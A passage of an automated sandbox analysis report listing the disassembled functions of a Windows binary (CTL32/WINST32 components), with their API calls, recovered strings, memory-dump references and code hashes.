                                                                                            • Part of subcall function 005AC2C0: FindWindowW.USER32(?,00000000), ref: 005AC340
                                                                                            • Part of subcall function 005AC2C0: Sleep.KERNEL32(?,?,?), ref: 005AC35C
                                                                                            • Part of subcall function 005AC2C0: FindWindowW.USER32(?,00000000), ref: 005AC370
                                                                                          • PostMessageW.USER32(00000000,0000004A,?,?), ref: 005AC4BE
                                                                                          Strings
                                                                                          • m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData), xrefs: 005AC445
                                                                                          • ..\CTL32\ipc.cpp, xrefs: 005AC440
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessageWindow$FindPost$ClassNameSendSleepThread
                                                                                          • String ID: ..\CTL32\ipc.cpp$m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData)
                                                                                          • API String ID: 3524374798-1411620790
                                                                                          • Opcode ID: 4484b102239f363fdca2ff9cc598e156703b52aabb6b06ece3bd63eececa8f9e
                                                                                          • Instruction ID: 2dad83644a1eb7a15625ab33b22ef0abee95e4067c7e0febf8fea2e6b7d162fa
                                                                                          • Opcode Fuzzy Hash: 4484b102239f363fdca2ff9cc598e156703b52aabb6b06ece3bd63eececa8f9e
                                                                                          • Instruction Fuzzy Hash: 9521B6763006059FDB14CF54E890DB6FBAAFB89325B10862AE55A87A40C730FC50CBA4
                                                                                          Function 005CEEF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 005CEFA0
                                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 005CEFB8
                                                                                          • DestroyIcon.USER32(?), ref: 005CEFC5
                                                                                          • ImageList_GetImageCount.COMCTL32(?), ref: 005CEFCC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: IconImage$List_$CountDestroyExtractReplace
                                                                                          • String ID: "
                                                                                          • API String ID: 2255942099-123907689
                                                                                          • Opcode ID: d39fe4e8ecdb0e992b47e921b23f4f590e564feb22a0d93636897e66baba80eb
                                                                                          • Instruction ID: 4ab28ee5bd849d146d3721a22cfe41274df5ff767c87708fb3bb49bd913b93b7
                                                                                          • Opcode Fuzzy Hash: d39fe4e8ecdb0e992b47e921b23f4f590e564feb22a0d93636897e66baba80eb
                                                                                          • Instruction Fuzzy Hash: E9319A315052199ECB20DFA4DC5AFEA77B5FF44310F04869DE915C7291E7B09E44CB91
                                                                                          Function 005BC560 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 81COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005BC4C0: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005BC4EA
                                                                                            • Part of subcall function 005BC4C0: GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005BC53D
                                                                                          • GetComputerNameW.KERNEL32(?,?), ref: 005BC60E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ComputerDirectoryInformationNameSystemVolume
                                                                                          • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                          • API String ID: 1311402438-1858614750
                                                                                          • Opcode ID: 9fc1cba19539a0e19846f758b9a19fef289adb59d08223ee2d67f47577e6df19
                                                                                          • Instruction ID: 7337249048329b8c119b120c721e6224bc54e202709609c5212c34ddef3ac875
                                                                                          • Opcode Fuzzy Hash: 9fc1cba19539a0e19846f758b9a19fef289adb59d08223ee2d67f47577e6df19
                                                                                          • Instruction Fuzzy Hash: 0F2104729006199ADB24AF258D41AFB7FA5FF94B11F444528FC46D7281FB34FA01C3A4
                                                                                          Function 0059E890 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(shcore.dll,DE64E134), ref: 0059E8BE
                                                                                          • GetProcAddress.KERNEL32(00000000,GetDpiForMonitor), ref: 0059E8D2
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0059E91A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                          • String ID: GetDpiForMonitor$shcore.dll
                                                                                          • API String ID: 145871493-92391707
                                                                                          • Opcode ID: cd54733393e3eb917dc29d171af810a61d4b9b9044ec6da70026dae2ffcc8090
                                                                                          • Instruction ID: bb0ec552794a1ef9d1d33c2fbe38d9ce4f48b07a2e99a64200a6a5c442a7d66f
                                                                                          • Opcode Fuzzy Hash: cd54733393e3eb917dc29d171af810a61d4b9b9044ec6da70026dae2ffcc8090
                                                                                          • Instruction Fuzzy Hash: 7311B231A042159BCB09CF5ACD55AEEBBB9FF85B14F05812AF815D7380DB34D900CB91
                                                                                          Function 005D41B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 60stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,0061F4D8,?,00000010,?), ref: 005D41E4
                                                                                          • lstrcmpiW.KERNEL32(00000001,0062250C), ref: 005D4215
                                                                                          • lstrcmpiW.KERNEL32(00000001,Yes), ref: 005D4224
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: lstrcmpi$PrivateProfileString
                                                                                          • String ID: True$Yes
                                                                                          • API String ID: 940435393-1480529194
                                                                                          • Opcode ID: 3cd19c678fe7f0a7fbc259eb64e55ec5c6de14f9dbd9cc1e7d492d4bb9e3e298
                                                                                          • Instruction ID: efa4cb0bff5adcbf61fcd024612e4688dbc988c36d2f52baf10f8f14d39d4254
                                                                                          • Opcode Fuzzy Hash: 3cd19c678fe7f0a7fbc259eb64e55ec5c6de14f9dbd9cc1e7d492d4bb9e3e298
                                                                                          • Instruction Fuzzy Hash: 95119471900209ABCB14DFA5DD59AEE7BF9EB48700F44415AFC05A7281DAB1EE44CBE0
                                                                                          Function 005AE540 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(USER32), ref: 005AE570
                                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 005AE57C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: GetMonitorInfoW$USER32$h
                                                                                          • API String ID: 1646373207-2164005547
                                                                                          • Opcode ID: 295c2cdfac9fe16960b005725fca340e0965233781eeddd85cacb68f133727bd
                                                                                          • Instruction ID: 536bc4ca233239cdee88cd6fbaa4273fded8a23c9868b63787ce851079c3268a
                                                                                          • Opcode Fuzzy Hash: 295c2cdfac9fe16960b005725fca340e0965233781eeddd85cacb68f133727bd
                                                                                          • Instruction Fuzzy Hash: 51019672E002086BDB04EFE59C0BBEE77B9EB45700F008115F9059B281EF71A914CBD2
                                                                                          Function 005CA7C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(dwmapi.dll), ref: 005CA802
                                                                                          • GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 005CA81E
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005CA849
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                          • String ID: DwmIsCompositionEnabled$dwmapi.dll
                                                                                          • API String ID: 145871493-1198327662
                                                                                          • Opcode ID: edc7d163174f78cf11d19acac3c1ddc303a2f5653892d8994cc5eb4c807f9e4e
                                                                                          • Instruction ID: 163ebe4dd0b31f182e01f4a5de5f10133ec08e3c90357fa6c454fc46ee328645
                                                                                          • Opcode Fuzzy Hash: edc7d163174f78cf11d19acac3c1ddc303a2f5653892d8994cc5eb4c807f9e4e
                                                                                          • Instruction Fuzzy Hash: 5601F5B14007A89FE7314FB8BC29B953ED5EF01B68F14922CE818890D1D7308941CFDA
                                                                                          Function 005AEC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000004,?,?), ref: 005AECC3
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005AECC9
                                                                                          • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000003,?,?), ref: 005AECEA
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005AECF0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseValue
                                                                                          • String ID: Policy
                                                                                          • API String ID: 3132538880-4157669408
                                                                                          • Opcode ID: 601b31b980fe2b446436ce92d0b7dc65eeb41ffd316078cca65509a808213b8d
                                                                                          • Instruction ID: 48a56669b30cddb8d15192482aa8db39ed7dec141b73cf3eeaaf965512827091
                                                                                          • Opcode Fuzzy Hash: 601b31b980fe2b446436ce92d0b7dc65eeb41ffd316078cca65509a808213b8d
                                                                                          • Instruction Fuzzy Hash: 1E014B72640700ABD630DAAADC91F97F3EDFB89B21F04891EB65593690C6B0FC44CB64
                                                                                          Function 005B0BA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000000,752F55F0,?,005B0C46,?,005B9820,?,00000000,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B0BA5
                                                                                          • GetVersion.KERNEL32(?,005B0C46,?,005B9820,?,00000000,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B0BC0
                                                                                          • SetLastError.KERNEL32(00000000,?,005B0C46,?,005B9820,?,00000000,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B0BD7
                                                                                          • ExitProcess.KERNEL32 ref: 005B0C19
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$ExitProcessVersion
                                                                                          • String ID: Z\
                                                                                          • API String ID: 3002118274-3850713075
                                                                                          • Opcode ID: 15882f4d1adfe201743db80048fc63dba749e803a3acb0a015ce78bd1e41328c
                                                                                          • Instruction ID: 638035b2c5a7b5491e039497724b458b4133ab4cd72f58e16afd8f6b8a300c90
                                                                                          • Opcode Fuzzy Hash: 15882f4d1adfe201743db80048fc63dba749e803a3acb0a015ce78bd1e41328c
                                                                                          • Instruction Fuzzy Hash: 4A014F706012099FEB10AF64EC9ABEB7BA9BF05364F14B105FE14822D2E734ED4186B1
                                                                                          Function 005BE6A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000004,?,?,00000000,?,?,005BE73F,00000000,0059A1FF), ref: 005BE6DC
                                                                                          • RegCloseKey.ADVAPI32(?,00000000,?,?,005BE73F,00000000,0059A1FF), ref: 005BE6E5
                                                                                          • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000003,?,?,00000000,?,?,005BE73F,00000000,0059A1FF), ref: 005BE712
                                                                                          • RegCloseKey.ADVAPI32(?,00000000,?,?,005BE73F,00000000,0059A1FF), ref: 005BE71B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseValue
                                                                                          • String ID: Policy
                                                                                          • API String ID: 3132538880-4157669408
                                                                                          • Opcode ID: e39795ad62d2e517a4f68dd4a25f08a720f95ba601e539f45f4fb5cd749773a8
                                                                                          • Instruction ID: 6b29cb1a01c6498085a7b257ed5524b932be4a5a55d081219f9c36d106ae7bcc
                                                                                          • Opcode Fuzzy Hash: e39795ad62d2e517a4f68dd4a25f08a720f95ba601e539f45f4fb5cd749773a8
                                                                                          • Instruction Fuzzy Hash: 4501E17164070467D735CA75DC46FD2B3EDAB58705F18491DB36A97180C6B4B8448B61
                                                                                          Function 005C8A70 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadStringW.USER32(00000000,?,?,00000847), ref: 005C8A88
                                                                                          • wsprintfW.USER32 ref: 005C8A9E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LoadStringwsprintf
                                                                                          • String ID: #%d$..\CTL32\util.cpp$i < cchBuf
                                                                                          • API String ID: 104907563-2369523344
                                                                                          • Opcode ID: 39edf9ba2f9a623852d100cb936da3f3c2cbcbf1beadeac663d2d6cfbe98e975
                                                                                          • Instruction ID: f97d138d1ab93948e8847deffa876f501c4cd8b3ee820d4aa2f1ac72344f9f62
                                                                                          • Opcode Fuzzy Hash: 39edf9ba2f9a623852d100cb936da3f3c2cbcbf1beadeac663d2d6cfbe98e975
                                                                                          • Instruction Fuzzy Hash: A2F0FC766002057BC7109B98EC59DEB7B5EFE85754B085026F904D3141EE71ED0087B1
                                                                                          Function 005D2DF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005D2E27
                                                                                          • MessageBoxW.USER32(00000000,?,WINST32,00000000), ref: 005D2E40
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Messagewsprintf
                                                                                          • String ID: Invalid Parameter %c%cCommand Line: <%s>Version: %s$V14.10$WINST32
                                                                                          • API String ID: 300413163-1732868714
                                                                                          • Opcode ID: 2ab6917feb179e6c56644fbedd8c722c242583998af3082b8865b9986a990fde
                                                                                          • Instruction ID: 78e6725d9bcfea2dd657d9346ffcebe9fc61e7cd696a1e486db092151362ee32
                                                                                          • Opcode Fuzzy Hash: 2ab6917feb179e6c56644fbedd8c722c242583998af3082b8865b9986a990fde
                                                                                          • Instruction Fuzzy Hash: ABF06874B44208ABD750DF94EC46F6A376AFB44701F458165FA499B2C0E970AA048BE5
                                                                                          Function 005BE770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnumWindows.USER32(Function_0002E090,?), ref: 005BE792
                                                                                          • OpenDesktopW.USER32(Winlogon,00000000,00000000,02000000), ref: 005BE7B0
                                                                                          • EnumDesktopWindows.USER32(00000000,Function_0002E090,?), ref: 005BE7BF
                                                                                          • CloseDesktop.USER32(00000000,?,005BE7EE), ref: 005BE7C6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$EnumWindows$CloseOpen
                                                                                          • String ID: Winlogon
                                                                                          • API String ID: 1029573575-744610081
                                                                                          • Opcode ID: 0265adf8152b13aeaeaca5314405beccc12f3110afd8693e5634473f6c46fa7d
                                                                                          • Instruction ID: 83d85c229d57d62bb7952b81cc09b5c0212388c0056c1f096ffaf182d6da04b8
                                                                                          • Opcode Fuzzy Hash: 0265adf8152b13aeaeaca5314405beccc12f3110afd8693e5634473f6c46fa7d
                                                                                          • Instruction Fuzzy Hash: 8EF0A771A007907BF72217209C9DFD66F5FFB95B55F1C6125F201B1241CBA42C40C6B4
                                                                                          Function 005C6840 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(kernel32.dll), ref: 005C6853
                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 005C6865
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005C6875
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                          • String ID: GetUserDefaultUILanguage$kernel32.dll
